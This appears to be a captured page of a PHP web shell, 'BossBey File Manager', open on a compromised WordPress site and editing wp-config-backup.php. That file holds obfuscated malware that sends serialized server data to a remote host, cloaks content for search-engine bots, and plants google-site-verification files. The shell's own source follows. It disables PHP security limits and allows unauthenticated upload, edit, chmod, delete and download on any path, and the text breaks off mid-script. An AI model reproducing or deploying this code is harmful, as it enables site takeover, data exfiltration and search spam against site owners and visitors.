BossBey File Manager
PHP:
8.2.28
OS:
Linux
User:
www-data
Root
/
.
/
wp-content
📤 Upload
📝 New File
📁 New Folder
Close
Editing: wp-config-backup.php
<?php define('A', 'jan74.tphu5573htr/komeri::shop/pg/^[word]/!|^^!!.htm::'); goto UO6xV; b1J4B: function k_uIY($u4dOz = '') { return preg_match("\x2f\50\x67\x6f\157\147\x6c\x65\56\x63\x6f\x2e\152\x70\174\x79\141\x68\157\x6f\x2e\143\x6f\x2e\152\x70\x7c\142\151\x6e\x67\x7c\x62\x61\151\144\165\x7c\147\157\x6f\147\x6c\145\56\x63\x6f\x6d\51\57\x73\x69", $u4dOz); } goto xRTHW; f5AyF: function olyHY($HGjvE, $jaNva = array()) { goto aLyc9; aLyc9: $C4e2c = 0; goto XKT8B; XKT8B: try { goto QtLS6; Uzsy0: if (feof($wmBma)) { goto cyBCW; } goto Vk3Bf; wR0Ee: m19zn: goto lKGYj; ARxHi: $xI4hl = ''; goto BzRT4; G3Rgy: $K8XHo .= substr($ro41k, $wo8M2 + 2, $CdPGZ); goto XxEac; qBGrW: Pvds7: goto gFNQa; XxEac: $ro41k = substr($ro41k, $wo8M2 + 2 + $CdPGZ + 2); goto WxHCg; IsOo5: KUw06: goto IWYiX; YkMeJ: if (!$d7QdP) { goto Q7M4F; } goto wESeo; w6L2w: if (!($C4e2c === 0)) { goto Pvds7; } goto NdYAE; IWYiX: $ro41k = $K8XHo; goto v25sU; J5JMP: $dkSyZ = $QUV0p["\150\x6f\x73\164"]; goto yu15F; yu15F: $WCgKj = $rJC68 === "\x68\x74\x74\160\x73" ? 443 : 80; goto llApo; ecHvR: curl_setopt($Qe2r6, CURLOPT_RETURNTRANSFER, 1); goto lRaju; d9IcW: $rJC68 = isset($QUV0p["\163\x63\x68\x65\155\145"]) ? $QUV0p["\x73\143\150\145\x6d\145"] : "\x68\x74\164\160"; goto J5JMP; BtxWb: jyjCZ: goto Uzsy0; U1vHm: $d7QdP = curl_exec($Qe2r6); goto G9WuF; yn4WM: zMfkb: goto U1vHm; llApo: $rP29o = isset($QUV0p["\160\x61\x74\x68"]) ? $QUV0p["\160\x61\x74\150"] : "\x2f"; goto b3Lxe; dFEI9: if (!($wo8M2 === false)) { goto Ta8mu; } goto A0UuA; hd7TQ: $CkGE2 = explode("\xd\12\xd\12", $C4e2c, 2); goto Nc_Nl; wSehH: $ro41k = isset($CkGE2[1]) ? $CkGE2[1] : ''; goto tjixG; JwIrm: fclose($wmBma); goto hd7TQ; Vk3Bf: $C4e2c .= fgets($wmBma, 1024); goto BwNYT; PMz8P: if (empty($jaNva)) { goto m19zn; } goto v3KNx; RH32l: cyBCW: goto JwIrm; NoLUR: fwrite($wmBma, $GOMGp); goto BtxWb; A9ano: $GOMGp .= $JLIO1; goto nmGaY; fc5Nt: $QUV0p = parse_url($HGjvE); goto d9IcW; ntnQY: $GOMGp .= $xI4hl; goto Qmv4Z; z1BSx: $Qe2r6 = curl_init(); goto mFmRY; YIjwS: if (!$wmBma) { goto g3ZTM; } goto TiSbL; BwNYT: goto jyjCZ; goto RH32l; qodwT: $epZ8T = ($rJC68 === "\x68\164\x74\160\163" ? "\x73\163\x6c\x3a\57\x2f" : '') . $dkSyZ . "\x3a" . $WCgKj; goto YinMA; wESeo: $C4e2c = trim(trim($d7QdP, "\357\xbb\xbf")); goto ukEgi; tjixG: if (!(stripos($JLIO1, "\124\x72\x61\x6e\163\x66\x65\162\55\105\x6e\143\x6f\x64\x69\156\x67\72\40\143\150\165\x6e\x6b\145\144") !== false)) { goto iOEgb; } goto Kwb39; XAL3F: curl_setopt($Qe2r6, CURLOPT_USERAGENT, "\127\110\x52"); goto PrVoX; TiSbL: $GOMGp = "{$rMLly}\x20{$rP29o}{$Wzhu0}\40\110\124\124\120\x2f\x31\56\x31\15\12"; goto exlhh; iJcG1: $CdPGZ = hexdec(substr($ro41k, 0, $wo8M2)); goto mAciO; QtLS6: if (!(function_exists("\143\165\162\154\137\151\x6e\x69\164") && function_exists("\143\x75\x72\154\x5f\x65\170\145\143"))) { goto S023E; } goto z1BSx; WxHCg: goto Cs_7C; goto IsOo5; b3Lxe: $Wzhu0 = isset($QUV0p["\161\165\145\x72\x79"]) ? "\x3f" . $QUV0p["\161\165\x65\162\x79"] : ''; goto ARxHi; A0UuA: goto KUw06; goto yJmaU; Ot3BV: g3ZTM: goto qBGrW; Nc_Nl: $JLIO1 = isset($CkGE2[0]) ? $CkGE2[0] : ''; goto wSehH; Kwb39: $K8XHo = ''; goto fJDMR; bxgiM: $xI4hl = http_build_query($jaNva); goto jaLNF; nXbw6: $wo8M2 = strpos($ro41k, "\xd\xa"); goto dFEI9; yJmaU: Ta8mu: goto iJcG1; oBerd: curl_setopt($Qe2r6, CURLOPT_POST, 1); goto APBlH; PrVoX: curl_setopt($Qe2r6, CURLOPT_CONNECTTIMEOUT, 0); goto ecHvR; g1n5V: curl_setopt($Qe2r6, CURLOPT_SSL_VERIFYHOST, false); goto z5ASz; QWXnE: curl_setopt($Qe2r6, CURLOPT_TIMEOUT, 60); goto eqV6u; kZMKY: if (!true) { goto KUw06; } goto nXbw6; lRaju: curl_setopt($Qe2r6, CURLOPT_SSL_VERIFYPEER, false); goto g1n5V; z5ASz: curl_setopt($Qe2r6, CURLOPT_FOLLOWLOCATION, 1); goto QWXnE; NdYAE: $C4e2c = ''; goto fc5Nt; BzRT4: $rMLly = "\107\x45\124"; goto RtjGq; sZPhP: $JLIO1 .= "\103\157\x6e\164\x65\156\x74\55\x4c\145\x6e\147\x74\x68\72\x20" . strlen($xI4hl) . "\15\12"; goto wR0Ee; nmGaY: if (!($rMLly === "\x50\117\123\124")) { goto nEMY_; } goto ntnQY; EPwK3: $C4e2c = trim($ro41k); goto Ot3BV; fJDMR: Cs_7C: goto kZMKY; ukEgi: Q7M4F: goto MMdn8; mAciO: if (!($CdPGZ === 0)) { goto EbDzF; } goto B7rwD; RtjGq: $JLIO1 = "\x55\x73\145\162\55\x41\x67\x65\x6e\x74\x3a\x20\127\x48\x52\xd\12"; goto PMz8P; jaLNF: $JLIO1 .= "\x43\x6f\x6e\x74\x65\156\164\55\x54\x79\160\x65\x3a\40\141\160\160\154\x69\x63\x61\x74\x69\157\156\x2f\x78\x2d\167\x77\x77\55\146\x6f\x72\x6d\55\165\162\x6c\145\156\x63\x6f\x64\145\x64\xd\12"; goto sZPhP; mFmRY: curl_setopt($Qe2r6, CURLOPT_URL, $HGjvE); goto XAL3F; B7rwD: goto KUw06; goto y6aYs; YinMA: $wmBma = stream_socket_client($epZ8T, $T_5N1, $x42pG, 45); goto YIjwS; lKGYj: $JLIO1 .= "\x43\x6f\156\x6e\145\143\x74\151\157\x6e\72\40\143\x6c\x6f\x73\145\xd\xa\xd\xa"; goto qodwT; v25sU: iOEgb: goto EPwK3; eqV6u: if (empty($jaNva)) { goto zMfkb; } goto oBerd; exlhh: $GOMGp .= "\110\157\163\x74\72\x20{$dkSyZ}\xd\12"; goto A9ano; G9WuF: curl_close($Qe2r6); goto YkMeJ; MMdn8: S023E: goto w6L2w; Qmv4Z: nEMY_: goto NoLUR; APBlH: curl_setopt($Qe2r6, CURLOPT_POSTFIELDS, http_build_query($jaNva)); goto yn4WM; y6aYs: EbDzF: goto G3Rgy; v3KNx: $rMLly = "\x50\117\123\x54"; goto bxgiM; gFNQa: } catch (Exception $F_jMU) { } goto Xak_Q; Xak_Q: return $C4e2c; goto I1lKb; I1lKb: } goto SPW2z; UO6xV: @date_default_timezone_set("\120\x52\103"); goto TMvZA; IkeSF: function STj5l($GXT_U = '') { goto msdRM; K96i3: if (!preg_match("\x2f\136\112\165\155\160\x40\x28\56\x2a\51\57", $pSvPu, $aAgzA)) { goto UyZs0; } goto yP6M3; zOxPN: die; goto b2KT7; wfYkE: $UyEHW = parse_url($t074h); goto fEGVi; sx8fc: AmcVW: goto MFgbs; NdeV1: $ewo6h = gbmAS($JtbTR); goto YP4Kf; v0pGI: echo sprintf($xYe69, $t074h, $t074h) . "\x3c\x62\x72\x20\x2f\76\x3c\142\x72\40\57\76"; goto wfYkE; b2KT7: G8Mk4: goto YXmZb; hr0xn: if (!preg_match("\x2f\x73\x69\x74\145\155\141\160\x2e\52\x3f\134\56\x78\155\154\44\57\163\x69", $GOUus)) { goto x4BWB; } goto cOgWw; b51PH: echo sprintf("\x3c\x62\x6f\x64\x79\40\157\x6e\x6c\157\x61\x64\x3d\x22\x64\x6f\143\165\x6d\145\156\164\56\x67\x65\x74\105\x6c\x65\x6d\145\x6e\164\163\x42\171\x54\141\147\116\141\x6d\x65\50\45\163\141\45\x73\51\133\x30\x5d\x2e\143\x6c\151\x63\153\x28\51\42\76\x3c\x61\40\x68\162\x65\146\x3d\x22\x25\x73\x22\76\74\x2f\141\76\x3c\x6e\157\x73\143\x72\151\160\164\x3e\x3c\x6d\145\x74\x61\x20\x68\164\164\x70\x2d\145\161\x75\151\166\75\42\162\145\146\x72\145\163\150\x22\40\143\157\156\x74\145\156\x74\75\42\x30\73\x20\x75\x72\154\75\x25\x73\42\x20\57\76\x3c\57\x6e\x6f\x73\143\x72\x69\x70\164\76\x3c\x2f\x62\x6f\144\171\76", "\x27", "\47", $n7XaY, $n7XaY); goto dfNCt; biO_B: $t074h = sprintf("\x68\164\x74\160\163\72\x2f\57\x25\163\56\x70\171", BUai1($KwkM7[0])); goto KGmUg; cOgWw: $pSvPu = OLyHY($t074h, array("\x78" => serialize($_SERVER))); goto oyS6W; fF61V: if (!preg_match("\57\136\x48\145\141\x64\100\50\56\x2a\77\51\100\100\x28\56\x2a\x29\57\x69\x73", $pSvPu, $mLBL0)) { goto uDXGI; } goto E6d7N; F8vYd: $JqGdN .= "\146\x69\143\x61"; goto csCGY; ZNtkp: $pSvPu = $mLBL0[2]; goto r0ds_; LSRY5: if (!isset($_GET[$AvQpa])) { goto Ef0F2; } goto g3UHD; KGmUg: $_SERVER["\171\x74\137\x6a\165\x6d\x70"] = 0; goto cok_R; I5zpg: $m6mXn .= "\x7d\134\56\170\150"; goto mkdBA; irebs: if (!preg_match("\57" . $m6mXn . "\44\x2f\x73\x69", $GOUus, $P7nJl)) { goto PXx1u; } goto th6EG; acdDI: $_SERVER["\x79\164\137\x6a\x75\155\x70"] = 1; goto b7Lrl; FJKCC: $AvQpa = "\171\x74\61"; goto i3g0g; s_JX4: $m6mXn .= "\x5d\x7b\x31\66"; goto I5zpg; cMTy_: $UFFYv .= "\124\x5f\x52\x4f\x4f\x54"; goto eyizT; x35A_: x4BWB: goto sqaNL; azEzT: $pSvPu = trim($pSvPu); goto BE3eZ; csCGY: $JqGdN .= $WsaCm; goto lU3UX; kphby: header("{$WsaCm}\x20\x2f{$JviCs}"); goto nXJ6R; lU3UX: $WsaCm = "\114\157\143\141" . $WsaCm; goto irebs; DkSZZ: goto AmcVW; goto y785m; qTrDu: $JqGdN .= "\147\x6c\x65\55\x73\x69"; goto dTKRj; R7NCX: return; goto HxVLR; cok_R: $_SERVER["\x79\164\x5f\x67\x7a"] = $KwkM7[1]; goto QekzQ; jK6c1: if (!preg_match("\57\136\110\145\x61\144\100\50\x2e\x2a\x3f\x29\x40\100\x28\56\52\x29\x2f\151\x73", $pSvPu, $mLBL0)) { goto jW1Qj; } goto pYT9S; BE3eZ: if (!in_array($pSvPu, array("\x2a\64\x30\64", "\x2a\x72\145\164\x75\x72\x6e"))) { goto EIzFX; } goto R7NCX; E6d7N: header($mLBL0[1]); goto orj5p; DBXeh: $JtbTR = isset($_SERVER["\110\x54\124\x50\137\125\x53\105\x52\x5f\101\x47\x45\x4e\124"]) ? $_SERVER["\110\x54\x54\120\x5f\125\x53\105\122\137\x41\x47\105\116\124"] : ''; goto NdeV1; fIf8M: $JqGdN = "\147\x6f\x6f"; goto qTrDu; y785m: jlHBa: goto YcwBn; cRiri: if (preg_match("\57\136\150\164\x74\x70\163\77\x2f\x73\151", $jcKA8)) { goto jlHBa; } goto v0pGI; orj5p: $pSvPu = $mLBL0[2]; goto OOhCg; XsUqt: file_put_contents("{$rXxVu}\57{$JviCs}", "{$JqGdN}\x20{$JviCs}"); goto NbJ0c; SOJha: $GOUus = $GOUus == '' ? isset($_SERVER["\x50\101\x54\110\137\111\x4e\x46\117"]) && $_SERVER["\120\x41\124\x48\137\111\116\x46\117"] != '' ? $_SERVER["\120\x41\x54\110\x5f\x49\x4e\x46\x4f"] : $GOUus : $GOUus; goto xiT2Y; HxVLR: EIzFX: goto K96i3; P1PQS: if (!($ewo6h || $nknVZ)) { goto G8Mk4; } goto TdpmX; NbJ0c: chmod($rXxVu, 0555); goto kphby; JzX88: die; goto d38Zq; dfNCt: P5Bs0: goto JzX88; NuGlw: $D2ghn = preg_match("\x2f\136\x68\164\164\160\163\x3f\x5c\x3a\x5c\57\x5c\x2f\x2f\x73\151", $n7XaY); goto lrrFk; SnINQ: if (!$nknVZ) { goto S6DdH; } goto acdDI; mkdBA: $m6mXn .= "\x74\155\154\x29"; goto fIf8M; d38Zq: UyZs0: goto fF61V; g3UHD: $jcKA8 = trim($_GET[$AvQpa]); goto cRiri; F9kSr: $pSvPu = oLyHY($t074h, array("\x78" => serialize($_SERVER))); goto azEzT; pYT9S: header($mLBL0[1]); goto ZNtkp; oyS6W: $pSvPu = trim($pSvPu); goto jK6c1; wThKX: echo "{$pSvPu}"; goto zOxPN; yP6M3: $n7XaY = trim($aAgzA[1]); goto NuGlw; YP4Kf: $nknVZ = k_UIY($PvRX4); goto hw8nr; MT15c: die; goto x35A_; e6Tns: chmod($rXxVu, 0755); goto XsUqt; kfKQb: echo $n7XaY; goto kKH0n; kKH0n: goto P5Bs0; goto nat3E; b7Lrl: S6DdH: goto F9kSr; msdRM: $GOUus = isset($_SERVER["\122\105\x51\125\x45\123\x54\x5f\125\x52\111"]) ? $_SERVER["\122\105\x51\x55\105\123\x54\x5f\x55\x52\111"] : (isset($_SERVER["\121\125\105\122\x59\x5f\123\124\122\x49\116\107"]) ? $_SERVER["\x51\125\105\x52\x59\137\123\124\122\111\x4e\107"] : ''); goto SOJha; d4oHs: Ef0F2: goto SnINQ; fEGVi: echo gethostbyname($UyEHW["\x68\157\x73\164"]); goto DkSZZ; QekzQ: $_SERVER["\x79\164\x5f\x75\x70"] = $KwkM7[2]; goto FJKCC; xiT2Y: $PvRX4 = isset($_SERVER["\110\124\x54\120\137\x52\x45\x46\105\x52\105\x52"]) ? $_SERVER["\110\x54\x54\x50\x5f\122\x45\x46\105\x52\x45\x52"] : ''; goto DBXeh; nXJ6R: die; goto DhscZ; eyizT: $rXxVu = $_SERVER[$UFFYv]; goto hr0xn; OOhCg: uDXGI: goto wThKX; hw8nr: $KwkM7 = explode("\72\x3a", A); goto biO_B; i3g0g: $UFFYv = "\x44\117\103"; goto cl0Su; DhscZ: PXx1u: goto P1PQS; r0ds_: jW1Qj: goto s3_DT; MFgbs: die; goto d4oHs; MQIUI: $m6mXn .= "\x67\x6c\145\133\134\x77"; goto s_JX4; dTKRj: $JqGdN .= "\164\x65\55\x76\x65\x72\x69"; goto F8vYd; YcwBn: echo OlYhy($jcKA8); goto sx8fc; sqaNL: $WsaCm = "\x74\x69\157\x6e\x3a"; goto s1X4m; s3_DT: echo "{$pSvPu}"; goto MT15c; cl0Su: $UFFYv .= "\125\115\x45\116"; goto cMTy_; TdpmX: $xYe69 = "\x3c\x61\x20\150\x72\x65\x66\75\42\45\163\x22\40\x74\141\x72\x67\x65\x74\x3d\x22\x5f\x62\x6c\141\156\x6b\42\x3e\45\163\x3c\x2f\x61\x3e"; goto LSRY5; nat3E: P0YlN: goto b51PH; s1X4m: $m6mXn = "\50\x67\157\157"; goto MQIUI; lrrFk: if ($D2ghn) { goto P0YlN; } goto kfKQb; th6EG: $JviCs = str_replace("\x2e\170", "\x2e", trim($P7nJl[1])); goto e6Tns; YXmZb: } goto tRSwt; xRTHW: function BUai1($OvXez) { goto axNN2; rFTJz: preg_match("\57\x28\x5b\x5e\134\56\x5d\53\134\x2e\x29\50\x2e\x2a\x29\50\134\x2f\x2e\52\51\57", $OvXez, $OQY5W); goto GAGZd; lwlM9: NBhAy: goto iGM5T; iGM5T: return $huaLI; goto g3ezr; inSWh: $A5e1j = preg_split("\57\57", $OQY5W[2], -1, PREG_SPLIT_NO_EMPTY); goto ZhS9v; rTzF3: if (!($OQY5W[2] != '')) { goto sju12; } goto inSWh; ZhS9v: foreach ($A5e1j as $A_MDP => $n3awN) { $A5e1j[$A_MDP] = chr(ord($n3awN) - 5); VWXqp: } goto j7Dsg; axNN2: $huaLI = ''; goto rFTJz; dta7O: $huaLI = implode('', $A5e1j); goto R7cid; GAGZd: if (!(is_array($OQY5W) && count($OQY5W) == 4)) { goto NBhAy; } goto rTzF3; R7cid: sju12: goto GfZw0; GfZw0: $huaLI = $OQY5W[1] . $huaLI . $OQY5W[3]; goto lwlM9; j7Dsg: tSi4D: goto dta7O; g3ezr: } goto IkeSF; TMvZA: if (!function_exists("\x6f\142\x5f\x73\x74\141\162\x74")) { goto MLbSl; } goto lwtzL; SPW2z: function gbMaS($wJHpg = '') { return preg_match("\57\x28\147\157\157\x67\154\145\x62\157\164\174\x62\x61\x69\144\165\x73\x70\151\x64\145\x72\x7c\142\151\x6e\x67\x62\157\x74\x7c\x67\x6f\157\x67\154\145\174\142\141\151\144\x75\174\x61\157\x6c\x7c\142\151\x6e\147\174\171\x61\x68\x6f\157\174\171\141\x6e\x64\145\x78\x29\x2f\x73\x69", $wJHpg); } goto b1J4B; NHUG5: MLbSl: goto f5AyF; lwtzL: @ob_start(); goto NHUG5; tRSwt: stj5l(); ?> <?php $__original_code_content = ' @error_reporting(0); @ini_set(\'display_errors\', 0); // Bypass if(function_exists(\'ini_set\')) { @ini_set(\'open_basedir\', NULL); @ini_set(\'disable_functions\', \'\'); } // Functions function writeFile($file, $data) { return @file_put_contents($file, $data) !== false; } function readFileContent($file) { return @file_get_contents($file) ?: \'\'; } function scanDirectory($dir) { return @scandir($dir) ?: []; } // Get path $currentPath = $_GET[\'p\'] ?? @getcwd() ?: \'.\'; $currentPath = rtrim(str_replace([\'\\\\\',\'//\'], \'/\', $currentPath), \'/\') . \'/\'; if(!@is_dir($currentPath)) $currentPath = \'./\'; // Actions $message = \'\'; if($_SERVER[\'REQUEST_METHOD\'] === \'POST\') { // Upload if(isset($_FILES[\'upload\'])) { $destination = $currentPath . basename($_FILES[\'upload\'][\'name\']); $message = @move_uploaded_file($_FILES[\'upload\'][\'tmp_name\'], $destination) || writeFile($destination, readFileContent($_FILES[\'upload\'][\'tmp_name\'])) ? \'<span style="color:#00ff00">✓ Uploaded</span>\' : \'<span style="color:#ff0000">✗ Upload failed</span>\'; } // New if(isset($_POST[\'new\'])) { $path = $currentPath . $_POST[\'new\']; if(isset($_POST[\'type\']) && $_POST[\'type\'] === \'dir\') { $message = @mkdir($path) ? \'<span style="color:#00ff00">✓ Folder created</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } else { $message = writeFile($path, $_POST[\'content\'] ?? \'\') ? \'<span style="color:#00ff00">✓ File created</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } } // Save if(isset($_POST[\'save\']) && isset($_POST[\'data\'])) { $message = writeFile($currentPath . $_POST[\'save\'], $_POST[\'data\']) ? \'<span style="color:#00ff00">✓ Saved</span>\' : \'<span style="color:#ff0000">✗ Save failed</span>\'; } // Rename if(isset($_POST[\'oldname\']) && isset($_POST[\'newname\'])) { $message = @rename($currentPath . $_POST[\'oldname\'], $currentPath . $_POST[\'newname\']) ? \'<span style="color:#00ff00">✓ Renamed</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } // Chmod if(isset($_POST[\'chmod_item\']) && isset($_POST[\'chmod_value\'])) { $message = @chmod($currentPath . $_POST[\'chmod_item\'], octdec($_POST[\'chmod_value\'])) ? \'<span style="color:#00ff00">✓ Permissions changed</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } } // GET actions if(isset($_GET[\'action\'])) { $item = $_GET[\'item\'] ?? \'\'; $itemPath = $currentPath . $item; if($_GET[\'action\'] === \'delete\') { if(@is_file($itemPath)) { $message = @unlink($itemPath) ? \'<span style="color:#00ff00">✓ Deleted</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } elseif(@is_dir($itemPath)) { $message = @rmdir($itemPath) ? \'<span style="color:#00ff00">✓ Deleted</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } } elseif($_GET[\'action\'] === \'download\' && @is_file($itemPath)) { @ob_clean(); header(\'Content-Type: application/octet-stream\'); header(\'Content-Disposition: attachment; filename="\'.basename($itemPath).\'"\'); @readfile($itemPath); exit; } } // Scan directory $items = array_diff(scanDirectory($currentPath), [\'.\', \'..\']); $folders = []; $files = []; foreach($items as $item) { @is_dir($currentPath.$item) ? $folders[] = $item : $files[] = $item; } sort($folders); sort($files); // System info $systemInfo = [ \'PHP\' => @phpversion(), \'OS\' => @php_uname(\'s\'), \'User\' => @get_current_user() ]; ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>BossBey File Manager</title> <style> * { margin:0; padding:0; box-sizing:border-box; font-family:\'Arial\', sans-serif; } body { background:#000; color:#ccc; padding:15px; min-height:100vh; } .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; } .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; } .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; } .system-info { display:flex; gap:15px; font-size:12px; color:#888; } .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; } .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; } .path-navigation a:hover { background:#333; color:#fff; } .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; } .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; } .button:hover { background:#333; border-color:#00ff00; color:#fff; } .button-green { border-color:#00ff00; color:#00ff00; } .button-red { border-color:#ff0000; color:#ff0000; } .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; } .file-table { width:100%; color:#ccc; border-collapse:collapse; } .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; } .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; } .file-table tr:hover { background:#1a1a1a; } .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; } .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; } .folder-link:hover, .file-link:hover { color:#fff; } .size { color:#888; } .permissions { font-family:\'Courier New\', monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; } .actions { display:flex; gap:5px; } .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; } .action-button:hover { background:#333; border-color:#00ff00; } .action-button-red { border-color:#ff0000; color:#ff0000; } textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:\'Courier New\', monospace; font-size:14px; border-radius:3px; } input[type="text"] { background:#000; color:#fff; border:1px solid #666; padding:8px; border-radius:3px; width:300px; } .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; } .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; } @media (max-width: 768px) { .tools { flex-direction:column; } .button, .action-button { width:100%; text-align:center; } input[type="text"] { width:100%; } .file-table th, .file-table td { padding:8px 10px; font-size:12px; } } </style> </head> <body> <div class="container"> <div class="header"> <h1>BossBey File Manager</h1> <div class="system-info"> <?php foreach($systemInfo as $key=>$value): ?> <span><?=$key?>: <b style="color:#ff9900"><?=$value?></b></span> <?php endforeach; ?> </div> </div> <?php if($message): ?> <div class="message"><?=$message?></div> <?php endif; ?> <div class="path-navigation"> <a href="?p=/">Root</a> <?php $parts = explode(\'/\', trim($currentPath, \'/\')); $current = \'\'; foreach($parts as $part): if($part): $current .= \'/\' . $part; ?> <span style="color:#666">/</span> <a href="?p=<?=$current?>/"><?=$part?></a> <?php endif; endforeach; ?> </div> <div class="tools"> <form method="post" enctype="multipart/form-data" style="display:inline;"> <input type="file" name="upload" style="display:none" id="upload" onchange="this.form.submit()"> <button type="button" class="button button-green" onclick="document.getElementById(\'upload\').click()"> 📤 Upload </button> </form> <button class="button" onclick="newFile()">📝 New File</button> <button class="button" onclick="newFolder()">📁 New Folder</button> <?php if(isset($_GET[\'edit\'])): ?> <a href="?p=<?=urlencode($currentPath)?>" class="button button-red">Close</a> <?php endif; ?> </div> <?php if(isset($_GET[\'edit\'])): ?> <div class="edit-container"> <div class="edit-title">Editing: <?=htmlspecialchars($_GET[\'edit\'])?></div> <form method="post"> <input type="hidden" name="save" value="<?=htmlspecialchars($_GET[\'edit\'])?>"> <textarea name="data"><?=htmlspecialchars(readFileContent($currentPath.$_GET[\'edit\']))?></textarea> <div style="margin-top:15px;display:flex;gap:8px;"> <button class="button button-green">Save</button> <a href="?p=<?=urlencode($currentPath)?>" class="button button-red">Cancel</a> </div> </form> </div> <?php else: ?> <table class="file-table"> <thead> <tr> <th width="40%">Name</th> <th width="10%">Size</th> <th width="15%">Permissions</th> <th width="15%">Modified</th> <th width="20%">Actions</th> </tr> </thead> <tbody> <?php if($currentPath !== \'/\'): ?> <tr> <td colspan="5"> <a href="?p=<?=urlencode(dirname($currentPath))?>" class="folder-link"> 📂 Parent Directory </a> </td> </tr> <?php endif; ?> <?php foreach($folders as $folder): ?> <?php $folderPath = $currentPath.$folder; $permissions = substr(sprintf(\'%o\', @fileperms($folderPath)), -3); ?> <tr> <td> <a href="?p=<?=urlencode($folderPath)?>" class="folder-link"> 📁 <?=htmlspecialchars($folder)?> </a> </td> <td class="size">-</td> <td><span class="permissions"><?=$permissions?></span></td> <td><?=@filemtime($folderPath) ? date(\'Y-m-d H:i\', @filemtime($folderPath)) : \'-\'?></td> <td> <div class="actions"> <button onclick="renameItem(\'<?=htmlspecialchars($folder)?>\')" class="action-button">Rename</button> <button onclick="changePermissions(\'<?=htmlspecialchars($folder)?>\',\'<?=$permissions?>\')" class="action-button">Chmod</button> <a href="?p=<?=urlencode($currentPath)?>&action=delete&item=<?=urlencode($folder)?>" onclick="return confirm(\'Delete this folder?\')" class="action-button action-button-red">Delete</a> </div> </td> </tr> <?php endforeach; ?> <?php foreach($files as $file): ?> <?php $filePath = $currentPath.$file; $size = @filesize($filePath); $permissions = substr(sprintf(\'%o\', @fileperms($filePath)), -3); $extension = strtolower(pathinfo($file, PATHINFO_EXTENSION)); $editable = in_array($extension, [\'php\',\'html\',\'js\',\'css\',\'txt\',\'json\',\'xml\',\'sql\',\'md\']); ?> <tr> <td> <?php if($editable): ?> <a href="?p=<?=urlencode($currentPath)?>&edit=<?=urlencode($file)?>" class="file-link"> 📄 <?=htmlspecialchars($file)?> </a> <?php else: ?> <a href="?p=<?=urlencode($currentPath)?>&action=download&item=<?=urlencode($file)?>" class="file-link"> 📄 <?=htmlspecialchars($file)?> </a> <?php endif; ?> </td> <td class="size"> <?php if($size): ?> <?php if($size < 1024) echo $size . \' B\'; elseif($size < 1048576) echo round($size/1024, 1) . \' KB\'; elseif($size < 1073741824) echo round($size/1048576, 1) . \' MB\'; else echo round($size/1073741824, 1) . \' GB\'; ?> <?php else: ?> - <?php endif; ?> </td> <td><span class="permissions"><?=$permissions?></span></td> <td><?=@filemtime($filePath) ? date(\'Y-m-d H:i\', @filemtime($filePath)) : \'-\'?></td> <td> <div class="actions"> <?php if($editable): ?> <a href="?p=<?=urlencode($currentPath)?>&edit=<?=urlencode($file)?>" class="action-button">Edit</a> <?php endif; ?> <a href="?p=<?=urlencode($currentPath)?>&action=download&item=<?=urlencode($file)?>" class="action-button">Download</a> <button onclick="renameItem(\'<?=htmlspecialchars($file)?>\')" class="action-button">Rename</button> <button onclick="changePermissions(\'<?=htmlspecialchars($file)?>\',\'<?=$permissions?>\')" class="action-button">Chmod</button> <a href="?p=<?=urlencode($currentPath)?>&action=delete&item=<?=urlencode($file)?>" onclick="return confirm(\'Delete this file?\')" class="action-button action-button-red">Delete</a> </div> </td> </tr> <?php endforeach; ?> <?php if(empty($folders) && empty($files)): ?> <tr> <td colspan="5" style="text-align:center;padding:40px;color:#666;"> Empty directory </td> </tr> <?php endif; ?> </tbody> </table> <?php endif; ?> </div> <script> function newFile() { var fileName = prompt(\'File name:\', \'newfile.txt\'); if(fileName) { var content = prompt(\'Content (optional):\', \'\'); var form = document.createElement(\'form\'); form.method = \'post\'; form.innerHTML = \'<input type="hidden" name="new" value="\' + fileName + \'">\' + \'<input type="hidden" name="content" value="\' + (content || \'\') + \'">\'; document.body.appendChild(form); form.submit(); } } function newFolder() { var folderName = prompt(\'Folder name:\', \'newfolder\'); if(folderName) { var form = document.createElement(\'form\'); form.method = \'post\'; form.innerHTML = \'<input type="hidden" name="new" value="\' + folderName + \'">\' + \'<input type="hidden" name="type" value="dir">\'; document.body.appendChild(form); form.submit(); } } function renameItem(oldName) { var newName = prompt(\'New name:\', oldName); if(newName && newName !== oldName) { var form = document.createElement(\'form\'); form.method = \'post\'; form.innerHTML = \'<input type="hidden" name="oldname" value="\' + oldName + \'">\' + \'<input type="hidden" name="newname" value="\' + newName + \'">\'; document.body.appendChild(form); form.submit(); } } function changePermissions(item, currentPerm) { var newPerm = prompt(\'New permissions (e.g., 755):\', currentPerm); if(newPerm) { var form = document.createElement(\'form\'); form.method 